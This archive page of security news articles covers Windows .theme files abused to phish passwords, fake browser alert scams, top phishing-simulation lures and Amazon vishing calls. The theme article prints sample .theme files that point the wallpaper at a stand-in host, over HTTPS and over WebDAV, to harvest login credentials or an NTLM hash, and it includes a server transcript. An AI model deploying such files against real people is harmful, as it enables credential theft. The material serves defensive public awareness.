Category Archives: News

Naked Security Live – “Should you worry about your wallpaper?”

Did you know that we do a show on Facebook every week in our Naked Security Live video series?

We usually discuss one of the big security concerns of the week – from data breaches and corporate hacks to vulnerabilities and scare stories – in a way that not only explains what happened but also offers useful tips about how to stay safe.

We’d love you to join in live if you can – just keep an eye on the @NakedSecurity Twitter feed or check our Facebook page on Fridays to find out the time.

It’s usually about 18:00 UK time, which is early afternoon/late morning on the East/West coast of North America.

Note that you don’t need a Facebook account to watch our live streams, although you will need to log in if you want to ask questions or post comments.

For those of you who [a] don’t use Facebook, [b] had buffering problems while we were live, [c] would like subtitles, or [d] simply want to catch up later, we also upload the recorded videos to our YouTube channel, where you can view them at your leisure.

Last week’s video topic dug into our popular article Serious Security: Hacking Windows passwords via your wallpaper, and #ICYMI, here it is to watch right now:



Thanks for watching… hope to see you later this week!


Serious Security: Hacking Windows passwords via your wallpaper

Our cybersecurity antennae always start vibrating when we see warnings about attacks that involve a new type of file.

We’re sure you have the same sort of reaction.

After all, if a file type that you’ve treated for years as mostly harmless suddenly turns out to be possibly very dangerous, you’re faced with a double dilemma:

  • How long will it take to unlearn an ingrained habit of trusting those files?
  • How long will the crooks take to start abusing this new-found knowledge?

We’re all aware of the risks posed by unknown EXE files, for example, because EXE is the extension for native Windows programs – even the operating system itself is implemented as a collection of EXEs.

Most of us also know to be wary of DLLs, which are actually just a special type of EXE file with a different extension to denote that they’re usually used in combination with other programs, rather than loaded on their own.

We’ve learned to be wary of DOCs and DOCXs and all the other Office filetypes, too, because they can include embedded programs called macros.

We’re also aware of a range of risky script files such as JS (for JavaScript), VBS (Visual Basic Script), PS1 (Powershell) and many others that are plain old text files to the untrained eye, but are treated as a series of system commands when processed by Windows itself.

We’ve even taught ourselves to be wary of the extent to which Windows itself misleads us because of its default approach to filenames – as in the case of the files alert and alert.txt below, which go out of their way to convince us they’re just innocent text:

Forget what they look like: those old-school icons on the left that give the impression of being medieval scrolls don’t denote plain old written text at all.

Ironically, however, the icon in the middle that looks like a crisply modern digital document, and that goes with a file that’s actually called document, really is a text file.

By default, Windows suppresses filename extensions, which are the all-important characters that follow the last dot in a filename, such as the .docx at the end of the Word file TaxReturn.docx or the .exe at the end of the program Notepad.exe.

Annoyingly, Windows itself very often uses extensions to decide what to do when you click on a file – for example, whether to view it harmlessly or to execute it riskily.

Yet the operating system rather patronisingly assumes that you don’t need to bother yourself with those pesky extra letters at the end of your filenames.

Indeed, if you turn on the View > File name extensions option (highly recommended!) in File Explorer, you’ll see the dangerous truth behind those “scroll icon” files that looked above as though they were called alert and alert.txt:

In real life, those are .js files, and if you double click on them thinking you are about to open them up to view their contents, then you will get an unpleasant surprise.

Windows will automatically run them as all-powerful JavaScript programs – not in the comparative safety of your web browser, but directly on your computer as local apps.

(Apparently that icon doesn’t represent a scroll. It’s meant to be a script. Who knew?)

Enter the Theme file

At the right-hand side of the images above, you’ll see files with the extension .theme, denoted by icons that depict what look like a series of background images.

We’re willing to bet that if you’ve ever downloaded and used .theme files (or .themepack files, which are just a collection of .theme files bundled together), you’ve not worried too much about security.

Very loosely speaking, Windows Themes are just INI-style text files that specify various settings for background colours, wallpapers, and visual effects.

Here’s a simple example, a copy of the file justatest.theme depicted above:

[Theme]
DisplayName=JustATest

[Control Panel\Desktop]
Wallpaper=C:\Users\duck\Pictures\justatest.png
TileWallpaper=0
WallpaperStyle=10
Pattern=

[VisualStyles]
Path=%SystemRoot%\resources\themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
ColorizationColor=0X6B74B8FC
Transparency=1

[MasterThemeSelector]
MTSM=DABJDKT

(No, we don’t know what the text MTSM=DABJDKT in the last line means or what it’s for; we just know that Microsoft insists that you have it in the file and says, “You do not have a choice of values for this parameter.”)

Admittedly, just loading untrusted image files, such as the Wallpaper file specified above, can theoretically be dangerous.

That’s assuming there’s an unpatched vulnerability in one of your apps, or in Windows itself, that can be reliably exploited to trick your computer into running a fragment of executable code when a deliberately crafted image file is opened.

In practice, however, that type of vulnerability is rare these days – those that are found are either quickly patched or jealously guarded, and can usually be triggered by delivering a booby-trapped image directly to your computer in a web page or an email rather than relying on a Theme file to reference them indirectly.

The danger posed by booby-trapped Themes is therefore both small and manageable – giving .theme files a justifiable assessment of mostly harmless.

Despite their generally low direct risk, .theme files nevertheless received a public airing in the notorious “Vault 7” data dump back in 2017, when WikiLeaks exposed a massive trove of confidential documents allegedly stolen from the CIA. Vault 7 included a knowledgebase article, supposedly from the CIA’s Information Operations Centre, remarking that Themes might be handy as a way of amplifying the effect of an existing exploit by allowing multiple variants of the exploit to be delivered in one go: “[I]n the cases where your execution vector uses icon rendering/file previews to exploit (link files, font files), a theme file can allow you to point to up to three other files and render them from one.”

Harmful after all

But some recent digging by a security researcher going by @bohops revealed that Themes are open to abuse by cybercriminals after all – albeit in an indirect way to phish for passwords rather than directly to implant malware on your computer.

Traditionally, .theme files are used simply as a way of triggering the automatic installation and rendering of one or more local files – indeed, that’s how the CIA envisaged using them for activating exploits:

In the animation above, you can see how double-clicking a .theme file launches the Windows Settings app, automatically navigates to the Preferences > Themes section, and then opens, copies, selects and renders the new wallpaper file justatest.png onto our desktop.

What if?

So far, things haven’t been very worrying.

Bohops, however, put his “What if?” cybersecurity research hat on, and wondered what might happen if he used a Theme file to reference images out on the internet, using web URLs instead of regular filenames.

Like this, taken from the file called justahack.theme seen above:

[Theme]
DisplayName=JustAHack

[Control Panel\Desktop]
Wallpaper=https://themefile.test/justahack.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
. . . .

All we’ve changed is the DisplayName of the Theme itself and the “filename” specified on the Wallpaper line.

In our real-world tests, we used a genuine domain name pointing at a test server of our own, fitted out with a genuine HTTPS certificate from Let’s Encrypt. Here, however, we have redacted the site name and replaced it with a special use domain name, as detailed in RFC 2606 and RFC 6761. We urge you to follow these RFCs in your own cybersecurity articles and documentation. By sticking to IP numbers and domain names that are realistic but will never be allocated in real life, you avoid the risk that someone might blindly copy and paste your examples into one of their own tests and subject some innocent third party to an inadvertent, annoying and possibly even dangerous attack.

Bohops realised that the Settings app will honour the URL in the Theme file, automatically connecting to it without showing you any sort of browser window, and attempting to fetch the file that’s referenced.

That’s slightly more worrying than reading a file that’s already on your computer, but probably still not enough to reclassify Themes as much worse than mostly harmless.

One step further

Bohops was able to go one step further, however.

The trick he figured out was simple but surprisingly effective: point the Theme file at a web server you control, configure your website to require authentication, and see if the Windows computer will supply you with a password.

We did that by mocking up a web server of our own in a few lines of Lua so we could track how the Settings app behaved.

In our server script, we collected the HTTP headers and used a basic HTTP 401 response (“must authenticate”) when the Settings app first came calling.

Here, we check that the web request doesn’t yet contain an Authorization header, which is how a web client denotes that it has already gone through the logon process:

Note that with HTTP Basic authentication, we get to choose the message that we’d like the other end to display when it prompts for your credentials.

The client responds to a 401 Must authenticate reply by collecting your username and password somehow, combining them into a text string with a colon (:) between, encoding them using Base64, and including the result in its next attempt to fetch the file.

Here’s what happened:

Notice how the credential popup is tagged as belonging to the Windows Settings app rather than your browser, giving it a credibility it doesn’t really deserve.

You should spot the subterfuge, of course, because the password dialog explicitly states the website name it’s connecting to, and makes it clear that it’s the website that’s asking for the password and providing the explanatory text, not Windows itself:

Password dialog when file is specified via an HTTPS link.

The Settings app will even connect to a non-HTTPS site to fetch Theme files (we tried it to see), though it will warn you not to put in your password due to the lack of encryption:

Password dialog if an unencrypted HTTP link is used for the file.

(If you try to use HTTPS but don’t supply a valid web certificate that Windows trusts, the Settings app will give up silently.)

Does it get worse?

As Bohops and others have pointed out, you can use a Windows UNC path instead of a website name in a Theme file, which tells Windows to use its file-based networking instead of a regular HTTP connection to retrieve the file.

UNC paths are well-known to users of Windows networking, and usually rely on Windows computer names and network share names, such as \\YOURPC\C$\Windows\System32\NOTEPAD.EXE

But you can put an internet domain name or an IP number into a Windows UNC name, and Windows will automatically trigger its built-in WebDAV client to fetch the file, instead of using its own networking protocols.

WebDAV is short for Web Distributed Authoring and Versioning and it’s a modified flavour of HTTP used to support network-based data stores that support files and directories like a regular local or networked filing system such as NTFS or CIFS.

We were able to get Settings to use WebDAV over TLS by specifying our wallpaper like this:

[Theme]
DisplayName=NowWithWebDAV

[Control Panel\Desktop]
Wallpaper=\\themefile.test@SSL@443\nowwithwebdav.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
. . . .
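The three Theme files above differ only in where the Wallpaper line points: a local drive, a web URL, or a WebDAV-style UNC path. As an added example (our own illustration, not code from the article or from @bohops), here is a small Python checker that parses a .theme file as INI text and flags any setting that points off the local machine, distinguishing the HTTP case from the \\host@SSL@port WebDAV syntax. The three sample files and the themefile.test host are constructed to match the article; the kind labels are our own.

```python
"""Flag Windows .theme settings that reference remote resources (example code)."""
import configparser
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed samples, modelled on the three Theme files shown in the article.
LOCAL_THEME = r"""[Theme]
DisplayName=JustATest
[Control Panel\Desktop]
Wallpaper=C:\Users\duck\Pictures\justatest.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
[VisualStyles]
Path=%SystemRoot%\resources\themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
ColorizationColor=0X6B74B8FC
Transparency=1
[MasterThemeSelector]
MTSM=DABJDKT
"""

HTTP_THEME = r"""[Theme]
DisplayName=JustAHack
[Control Panel\Desktop]
Wallpaper=https://themefile.test/justahack.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
"""

WEBDAV_THEME = r"""[Theme]
DisplayName=NowWithWebDAV
[Control Panel\Desktop]
Wallpaper=\\themefile.test@SSL@443\nowwithwebdav.png
TileWallpaper=0
WallpaperStyle=10
Pattern=
"""

# http:// or https:// at the start of a value
URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# \\host[@SSL][@port]\share...  (the @SSL/@port suffixes are the WebDAV-over-TLS form)
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\@]+)(?P<ssl>@SSL)?(?:@(?P<port>\d+))?\\", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


@dataclass(frozen=True)
class Finding:
    section: str
    key: str
    value: str
    kind: str  # "web-url", "webdav-unc", "remote-unc" or "network-unc" (our labels)


def classify(value: str) -> Optional[str]:
    """Return a kind label for a remote-looking value, or None for local values."""
    v = value.strip()
    if URL_RE.match(v):
        return "web-url"  # Settings will fetch this over HTTP(S), as in the article
    m = UNC_RE.match(v)
    if not m:
        return None  # drive letter path, %SystemRoot% path, plain setting, etc.
    if m.group("ssl") or m.group("port"):
        return "webdav-unc"  # explicit WebDAV mini-redirector syntax
    host = m.group("host")
    if "." in host or IPV4_RE.match(host):
        return "remote-unc"  # dotted name or IP: may be reached via WebDAV
    return "network-unc"  # plain computer name on the local network


def scan_theme(text: str) -> List[Finding]:
    """Parse Theme INI text and return every value that points off the machine."""
    # interpolation=None: values such as %SystemRoot% must not be treated as
    # configparser interpolation; delimiters=("=",) keeps "C:\..." values intact.
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keep key names exactly as written in the file
    cp.read_string(text)
    findings: List[Finding] = []
    for section in cp.sections():
        for key, value in cp.items(section):
            kind = classify(value)
            if kind is not None:
                findings.append(Finding(section, key, value.strip(), kind))
    return findings


def is_local_only(text: str) -> bool:
    """True when no setting in the Theme references a remote resource."""
    return not scan_theme(text)


if __name__ == "__main__":
    for name, theme in [("local", LOCAL_THEME), ("http", HTTP_THEME), ("webdav", WEBDAV_THEME)]:
        for f in scan_theme(theme) or [None]:
            print(name, "->", f if f else "no remote references")
```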

In theory, getting Windows to connect to a WebDAV resource that requires authentication ought to provoke a Windows-style network login popup, using Windows NTLM (native) authentication rather than the less convincing HTTP-style credential popup that we saw above.

This would make it more likely that a rogue Theme file could trick you into putting in your regular Windows username and password, although NTLM authentication uses a challenge-response hashing system that means the plaintext of your password would not be revealed as it was above when we forced HTTP Basic authentication.

An attacker using the UNC approach would therefore have to collect a hash of your password and crack it – somewhere between very difficult and impossible if you have chosen wisely.

Nevertheless, cybercriminals might be able to recover a poorly-chosen password if they have plenty of computer power to throw at the cracking task (which can be done offline).

We got nowhere

We weren’t able to get anywhere using UNC filenames, however.

We were able to get Windows to make a secure WebDAV connection to our mocked-up WebDAV server, where we could monitor the requests from the Settings app.

Once again, we used a stripped down Lua server, and this time we recorded this transcript:

===Connection 1 opened
...trying TLS
+++using TLS
request-->
OPTIONS /justahack.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
translate: f
host: themefile.test
reply<----
HTTP/1.1 204 No Content
MS-Author-Via: DAV
DAV: 1, 2
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK, ACL
Content-Length: 0
===Closed 1
===Connection 2 opened
...trying TLS
+++using TLS
request-->
PROPFIND /nowwithwebdav.png HTTP/1.1
connection: Keep-Alive
user_agent: Microsoft-WebDAV-MiniRedir/10.0.19041
depth: 0
translate: f
content_length: 0
host: themefile.test
reply<----
HTTP/1.1 401 Must authenticate
WWW-Authenticate: NTLM
Content-Length: 0
Connection: close
===Closed 2

The session opens with an OPTIONS command, where the client verifies that it’s talking to a WebDAV server rather than to an HTTP server that lacks the WebDAV extensions.

The command PROPFIND that follows is essentially the WebDAV equivalent of the Windows function pair FindFirstFile()/FindNextFile(), and shows us which file Windows wants to download.

We replied to Windows and requested the use of HTTP NTLM authentication.

Other researchers who have looked into WebDAV behaviour in the past have reported that the WebDAV client reacts to HTTP NTLM authentication demands by repeating its original unauthenticated request several times, before finally conceding defeat and going through the NTLM challenge-response process.

This ultimately reveals a hashed version of your Windows password that can be attacked, and possibly cracked if the attacker is lucky.

However, in the tests where we double-clicked on Theme files that specified a remote UNC resource, we were not able to provoke Settings into attempting authentication at all, let alone revealing a Windows password hash.

After 19 attempts to locate the nowwithwebdav.png file without authentication, the Settings app gave up every time.

What we can’t tell you is whether that’s down to a deliberate security restriction in the relevant part of the Settings app, to a default Windows NTLM setting that’s specific to the operating system version we were using (Windows 10 Enterprise 19041.450), to a limitation in our fake WebDAV server, or to something else entirely.

If you get further than we did with UNC paths, let us know in the comments below!

What to do?

Fortunately, this isn’t a critical security problem and should be easy to avoid, even if the crooks decided to start trying it out in earnest.

Here are our six tips to stay safe:

  • Read password prompts carefully. We agree with @bohops that the phishing popup we demonstrated above is more believable than seeing the same sort of login prompt directly in your browser, not least because the password box is convincingly headlined Settings. Nevertheless, the dialog does make it clear that the password request comes from a remote website, not from Windows, and that the login message comes from the site too, not from the operating system.
  • Avoid opening files you aren’t familiar with. It’s harder to spot that something unusual is going on if you aren’t familiar with what is usual.
  • Turn on the option to show file extensions. In File Explorer, click on the View item in the menu bar and then turn on the option File name extensions. If the Explorer window is narrow you may need to open the Show/hide tab first. Windows uses file extensions to decide how to handle files, and you should too, because the crooks love to use names like safe.txt.js or harmless.document.exe to throw you off the scent.
Turning on the Windows option to show file extensions.
  • Use a cybersecurity product that includes outbound web filtering. Sophos products, for example, don’t just scan incoming files for malware. After all, phishing attacks don’t rely on getting bad stuff into your network on purpose – they rely on you inadvertently letting good stuff out by mistake. Web filtering can keep you clear of rogue sites in the first place to keep you even further out of harm’s way.
  • Pick proper passwords. No, a complex password wouldn’t protect you against the HTTP Basic authentication trick shown above if you entered your own password anyway. But proper password choice will protect you if all an attacker can acquire is a strongly hashed version of your password, because the only way to recover the password is to try a lengthy list of likely passwords in the hope of finding one that matches the hash. Don’t be the first to fall!
  • Report unusual or suspicious content promptly to your security team. We’re betting that you’ve never, or at most very rarely, had anyone trying to foist a Theme file on you before. If an outsider tries to talk you into clicking, opening or approving something that you didn’t expect, don’t need and that you can’t see the point of… ask yourself, “Why would anyone do that?”

Fake web alerts – how to spot and stop them

Internet scammers are always looking for a better way to separate unwitting device users from their money. And as with all other endeavors, they’ve learned that it pays to advertise.

At SophosLabs we recently researched a collection of scams that exploit web advertising networks to pop up fake system alerts on both computers and mobile devices. The goal: to frighten people into paying for a solution—to a problem they don’t even have.

It’s not exactly a new trick. “Scareware” pop-ups have been used for years to prompt people into downloading fake virus protection and other malicious software, including ransomware.

But the latest variations find other ways to cash in on fake alerts: using them as the entry point to technical support scams or prompting their victims to purchase fraudulent apps or “fleeceware” off a mobile app store.

Technical support scam ad

Browser developers have done a lot to limit the damage that can be done by malicious pop-up sites, including recent fixes by Mozilla that attempt to limit the ability of malicious web pages to slow down and lock up the Firefox web browser.

But even if the scammers don’t lock up your web browser, they can make it appear that something has gone terribly wrong—and that you need to do something immediately about it.

Scammers pressure victims into taking action

That’s where the potential damage begins, with victims allowing the fraudsters to gain access to their device, and to install and extract payment for totally unneeded (and potentially harmful) software. These scams reap tens of millions of dollars from their victims each year.

A whole industry has sprung up around fake alert scams, including scam kit toolkit developers and commercial platforms for managing malicious advertising campaigns.

That industry is diversifying its customer base as well. We’ve recently spotted fake alert campaigns targeting Japanese, German, and French-speaking Windows and macOS users, and have observed efforts by tech support scammers to find people who speak those languages to participate in their scams.

What to do?

Fortunately, these scams are usually pretty easy to spot if examined critically. Like phishing messages, they often contain messages with strange phrasing, capitalization, and grammar or spelling mistakes.

Look out for poor grammar and odd phrasing

Sometimes they include a countdown, in order to make you more nervous—after which they suggest your phone or computer will be damaged.

Scammers create a sense of urgency with wording and countdowns

And some technical support scams will play computer-generated voice messages urging you to take action.

But all of these scams have one very specific thing in common—they go away when you close your browser.

While mobile fake alerts and similar pages on desktop browsers can be easily closed, “browser lock” support scam pages often use scripts that make it difficult or impossible to close the web browser normally or navigate away from the page, including:

  • Forcing the browser window to full screen size.
  • Hiding or camouflaging the mouse cursor.
  • Launching never-ending file downloads.
  • Popping up log-in boxes that request a username and password.
  • Attempting to capture keystrokes to prevent navigation away from the page with keyboard shortcuts.

Using Task Manager (on Windows) or Force Quit (on macOS) may be the only way to escape some of these pages, short of a reboot—that and not allowing the browser to restore pages from the last session when re-launching.

However, the best way to prevent most of these attacks is to cut off the ad networks that they rely on.

Privacy tools such as the Electronic Frontier Foundation’s Privacy Badger browser add-on block trackers used by less reputable ad networks. Reputation-tracking services can help as well, blocking domains known to host or deliver malicious ads.

As with phishing, education is also key. If you’re on your guard for these scams you’re less likely to fall for them.

If you’d like to learn more and get behind-the-scenes analysis, check out the SophosLabs deep dive report.

Phishing tricks – the Top Ten Treacheries of 2020

Sophos Phish Threat, in its own words, is a phishing attack simulator – it lets your IT department send realistic-looking fake phishes to your own staff so that if they do slip up, and click through…

…it’s not the crooks on the other end.

The crooks are testing you all the time, so you might as well test yourself and get one step ahead.

(Don’t panic – this isn’t a product infomercial, just some intriguing statistics that have emerged from users of the product so far this year.)

You can knit your own scam templates to construct your own fake phishes, but the product includes an extensive collection of customisable templates of its own that we update regularly.

The idea is to track the look and feel of real-world scams of all types, all the way from Scary Warnings of Imminent Doom to low-key messages saying little more than Please see the attached file.

History teaches us that email tricks can work surprisingly well with no text in the message body at all. One of the most prevalent email viruses of all time was HAPPY99, also known as Ska, which came out just over 20 years ago at the start of 1999. The email consisted only of an attachment – there was no subject line or message, so the only visible text in the email was the name of the attachment, HAPPY99.EXE. If you opened it, a New Year’s fireworks display appeared, though the animation was cover for the virus infecting your computer and then spreading to everyone you emailed thereafter. Ironically, the lack of any explanatory text at all meant that the email was much less suspicious than if the subject line had contained words in a language the recipient wouldn’t have expected. HAPPY99 as a filename all on its own had a timely and global appeal that almost certainly tricked millions more people into clicking it than if it had included any sort of marketing pitch.

Searching for the best worst

Well, the Phish Threat team asked themselves, “Which phishing templates give the best, or perhaps more accurately, the worst results?”

Are business email users more likely to fall for sticks or carrots? For threats or free offers? For explicit instructions or helpful suggestions? For “you must” or “you might like”?

The answers covered a broad range of phishing themes, but had a common thread: not one of them was a threat.

Most of them dealt with issues that were mundane and undramatic, while at the same time apparently being interesting, important, or both.

Nothing on this list was truly urgent or terrifying, and they all sounded likely and uncomplicated enough to be worth getting out of the way quickly.

The Top (or Bottom) Ten

  1. Rules of conduct. This purported to be a letter from HR outlining the company’s new Rules of Conduct. With global interest in increasing workplace diversity and reducing harassment, many companies are revising their employment guidelines. Most staff know that they’re supposed to read new guidelines, and that the HR team is obliged to chase them until they do, so clicking through here feels like a task you might as well get out of the way.
  2. Delayed year-end tax summary. This notified staff that their tax documentation wouldn’t arrive when they expected. Whether your country calls it a W-2, a P60, an IRP 5 or a Payment Summary, it’s one of those “necessary evils” that staff know they need, so they might as well find out how long the delay will be.
  3. Scheduled server maintenance. We were surprised that this was #3, because we rather cynically assumed that most people would be inclined to ignore IT messages of this sort, on the grounds that they couldn’t do anything about them anyway. In retrospect, however, now that so many people are working from home, we suspect that people like to know when outages are likely so they can schedule their own lives around them.
  4. Task assigned to you. In this message, the Phish Threat user gets to pick a project scheduling system that their own company uses (e.g. JIRA, Asana), so that the email doesn’t stand out as obviously bogus. Although that makes this a semi-targeted phish, you should assume that the business tools used in your company are widely known and easy for crooks to figure out, perhaps even automatically.
  5. New email system test. Who doesn’t want to be helpful, if all it takes is one quick click?
  6. Vacation policy update. Thanks to coronavirus lockdown and quarantine, booking and taking vacation leave is a tricky issue these days. Many companies are adapting their vacation policies accordingly – and who wants to risk missing out on time off?
  7. Car lights on. In this message, the building manager was apparently being cheerily helpful by reporting a car with its lights turned on. In real life, you might be suspicious that they posted a picture instead of just typing in the vehicle tag – but it occurred to us that many states and provinces in North America don’t supply front plates any more, so a photo taken from the front of the vehicle probably wouldn’t show the tag (registration number) anyway.
  8. Courier service failed delivery. This is a tried and tested trick that crooks have used for years. It’s especially believable these days thanks to the surge in home deliveries due to coronavirus. In fact, you may be expecting a delivery yourself right now – and in most cases it’s the vendor who decides which courier company to use, so you might not know who is doing the drop.
  9. Secure document. This purported to be a “secured document” from the HR team, giving a plausible reason for making you take an unusual route to view it. This trick is widely used by phishing crooks as a reason to convince you to enter passwords where you wouldn’t usually have to, or to adjust the security settings on your computer – ostensibly for the sake of improving security, but in reality to reduce it.
  10. Social Media Message. This one was a simulated LinkedIn notification promising that “You have unread messages from Joseph”. LinkedIn seems to be enjoying a surge in popularity right now, which is not surprising considering how many people have lost their jobs or had their working hours cut because of the coronavirus downturn. It’s tempting to click through, for fear of missing out, and scammers are happy to capitalise on that.

What to do?

  • Think before you click. Even if the message looks innocent at first sight, are there any scam giveaways that are obvious if you take the time to check? Examples include: spelling mistakes you doubt the sender would make, terminology that isn’t how your company would say it, software tools your company doesn’t use, and behaviour such as altering security settings you have explicitly been warned not to change.
  • Check with the sender if you aren’t sure. But never check by replying to the email to ask if it’s genuine – you will get the answer “Yes” either way, because a legitimate sender would tell the truth but a crook would lie. Use a corporate directory accessible via trustworthy means to find a way to get in touch with a colleague you think has been impersonated.
  • Take a careful look at links before you click. Many phishing emails contain text and images that are error-free. But the crooks often have to rely on temporary cloud servers or hacked websites to host their phishing web pages, and the subterfuge often shows up in the domain name they want you to visit. Don’t be tricked because a server name looks “close enough” – crooks often register near-miss names such as yourcompanny, yourc0mpany (zero for the letter O) or yourcompany-site, using misspellings, similar-looking characters or added text.
  • Report suspicious emails to your security team. Get in the habit of doing this every time, even though it feels like a thankless task. Phishing crooks don’t send their emails just to one person at a time, so if you’re the first in the company to spot a new scam, an early warning will let your IT department warn everyone else who might have received it too.

By the way, if you’re in the security team and you don’t have a quick and easy way for your staff to report potential cybersecurity problems such as suspicious phone calls or dodgy emails, why not set up an easy-to-remember internal email address today, and get used to monitoring it?

It doesn’t take much encouragement to turn your entire workforce into the eyes and ears of the security team.

After all, when it comes to cybersecurity, an injury to one really is an injury to all.


Vishing scams use Amazon and Prime as lures – don’t get caught!

Well-known US cybercrime journalist Brian Krebs recently published a warning about vishing attacks against business users.

The FBI promptly followed up on Krebs’s article with a warning of its own, dramatically entitled Cyber criminals take advantage of increased telework through vishing campaign.

So, what is vishing?

And how does it differ from phishing, something that most of us see far too much of?

The V in vishing stands for voice, and it’s a way of referring to scams that arrive by telephone in the form of voice calls, rather than as electronic messages.

Of course, many of us use voicemail systems that automatically answer and record messages when we aren’t able or willing to take a call in person, and many modern voicemail systems can be programmed to package up their recordings and deliver them as email attachments or as web links.

So the boundary between voice calls and electronic messages is rather blurred these days.

Nevertheless, many of us still routinely pick up calls in person when we can – especially those of us who run a business, or who have family members we’re supporting through coronavirus lockdown or who aren’t well and might need urgent help.

We know several people who keep a landline especially as a contact point for family and friends.

They give out their landline number sparingly on what you might call a “need-to-know” basis, and use their mobile number – which is comparatively easy to change if needed, and easy to monitor and filter using a suitable app – for day-to-day purposes where giving out a working number can’t easily be avoided.

As you can imagine, however, the crooks only need to uncover your phone number once, perhaps via a data breach, and they can call it forever, especially if it’s a landline that you’re keeping because people who are important to you know it and rely on it.

Semi-targeted phone attacks

The crooks don’t even need to know any details behind your number to abuse it, in the same way that they don’t need to know your full name, where you live or what you do for a living in order to spam and scam you by email.

Obviously, the more an attacker knows about you, the more they can tailor their scams – or target them, in the military jargon that’s become trendy in the cybersecurity field.

Even being able to say “Hello Your Real Name” instead of “Dear Customer” makes a message more believable, and including personal information can make a spam or scam more convincing still.

That’s why porn scammers, also known as sextortionists, who email to demand money for “suppressing” a prurient video of you (one that they don’t have because it doesn’t exist), include personal data in the message, such as your phone number or an old password.

They do this as a way of “proving” that they really did hack your computer, even though they almost certainly acquired the data from an ancient data breach.

Vishing scams, however, just like smishing scams (phishing via SMS), can sound realistic even if the crooks can do no better than guess at your online life.

Unlike emails, SMSes and voice messages – especially automated ones that use a synthetic voice and don’t need to be interactive – can get away with being stripped to the basics.

SMSes are limited to 160 characters, while voice messages are limited by the fact that about 30 seconds is the longest that people are likely to listen with any sort of attention to a recorded warning – and that is enough time for just 60 words dictated with any clarity.

And by picking a popular and widely-used service as the theme of the scam – such as a well-known global home delivery brand, email provider or payment processor – the crooks have a good chance of guessing correctly for a significant minority, perhaps even an absolute majority, of recipients.

Vishing at home

60 words or so turns out to be more than enough to create a believable bait, especially when it’s a voice message that lacks the permanence of an email or an SMS.

And, in the UK at least, there seems to have been a recent surge in home delivery vishing campaigns.

We can’t tell whether this is just one group of crooks who are focusing on both vishing and the UK at the moment, or if it’s a broader global trend, but we (and people we know in the UK) are experiencing unwanted vishing calls at a much greater rate than any time in the past few years.

We’re not talking about interactive scams here, like those fake technical support calls where a crook with the gift of the gab calls up out of the blue to pester, lie, cheat and frighten you about made-up malware on your computer in order to talk you into buying a fraudulent “cleanup service” that you didn’t need in the first place.

This new wave of calls is automated, using voice synthesis to “speak” with diction and an accent that is nearly, but not quite, as good as Siri, and they seem to follow a shorter and much crisper script than similar scams we’re aware of from the past couple of years.

Most older recordings we’ve heard have English text with poor wording and grammar that was either synthetically generated by poor-quality voice software or dictated by someone reading inexpertly from a printed script.

But this latest batch sounds much more believable, following scripts roughly along these lines (we don’t have recordings, so these are paraphrased from various Naked Security readers’ memory):

Your Amazon order for [several hundred pounds ending in -99] has now been processed. Your [phone product] will soon be dispatched and you should receive it in [a small number] of days. For further information or to cancel the order, press 1 now to speak to an operator.

Your Amazon Prime subscription will auto-renew. Your card will be billed for [several tens of pounds ending in -.99]. To cancel your subscription or to discuss this renewal, press 1 now.

One of our readers pressed 1 to see what would happen (we don’t recommend doing this, simply because the only thing you can be certain of is that you will be talking to an out-and-out criminal who knows your phone number and perhaps even where you live).

As you can probably imagine, the reader ended up talking to a real human in what sounded like a boiler-room call centre, just as you would if you were called directly by one of those technical support scammers claiming to be from Microsoft or your internet provider.

Why it works

The sad things about this sort of scam are:

  • The crooks use internet telephony (VoIP), so they pay close to zero for the calls.
  • The calls emerge into the landline or mobile network inside your country, so they often show up with a believable local number.
  • Synthetic voice calls are widely used by legitimate businesses these days, so they are no longer a telltale sign that the call is suspicious.
  • The call centre crooks only ever deal with “already active” callers who have pressed 1, making their scamming process more efficient.
  • The calls are hard to avoid, especially if they arrive on a line that you keep primarily for family emergencies.
  • The incoming call numbers change all the time, so that adding them to your phone’s blocklist, if it has one, doesn’t help much.
  • Reporting them feels like a waste of time, because the callers are almost certainly outside the jurisdiction of your own telecommunications regulator.

What to do?

Unfortunately, this is one of those cybercrimes for which we don’t have a good set of “this will fix the problem” answers.

Some people find that running all their calls through voicemail acts as a filter and stops the calls being intrusive, but if it’s a landline you rely on for the timely report of family emergencies then you still need to let the phone ring aloud to alert you to the call, and you may not know what incoming numbers to expect anyway.

(If your emergencies include possible calls from healthcare workers or hospitals, you will often find that those people and organisations withhold their numbers to cut down on nuisance replies or to protect the privacy of the workers involved.)

Reporting unwanted phone calls can be somewhere between impossible, if the number is withheld, and very hard, depending on your country.

For example, in the UK there is – rather annoyingly – a different procedure for reporting scam calls, which is where someone calls you up and talks a load of lies or unwanted junk into your ear, and abandoned or silent calls (“hangups”), which is where the caller cuts the connection before a human comes on the line at their end.

Calls where the other end doesn’t say a word, either through an unnerving silence or by using an automated voice only, are understandably considered creepier and therefore criminally more serious than viva voce, in-your-ear dishonesty, and are therefore regulated differently.

In the former case, in our experience trying to report rogue callers in the UK in the past, you can make your report anonymously; in the latter, the process is more complicated and you have to say who you are, presumably because scam calls are a regulatory issue but abandoned and silent calls may be a criminal offence.

So, if you can recover the caller’s number and are willing to report it, we encourage you to do so.

But we accept that this may be too much effort, or require too much personal involvement, for some people in some countries, so we’re not going any further than encouragement here.

All we can advise as a matter of routine is the rhythmic and easily-remembered ditty that the Australian cybersecurity industry came up with many years ago as a way of thinking about how you deal with spammers and online charlatans: Don’t try. Don’t buy. Don’t reply.

Don’t let yourself get sucked, surprised or seduced into taking any direct action – not even if you think it might be amusing to see who’s at the other end – after all, you’re talking to a crook, so the best thing that can happen to you is nothing.

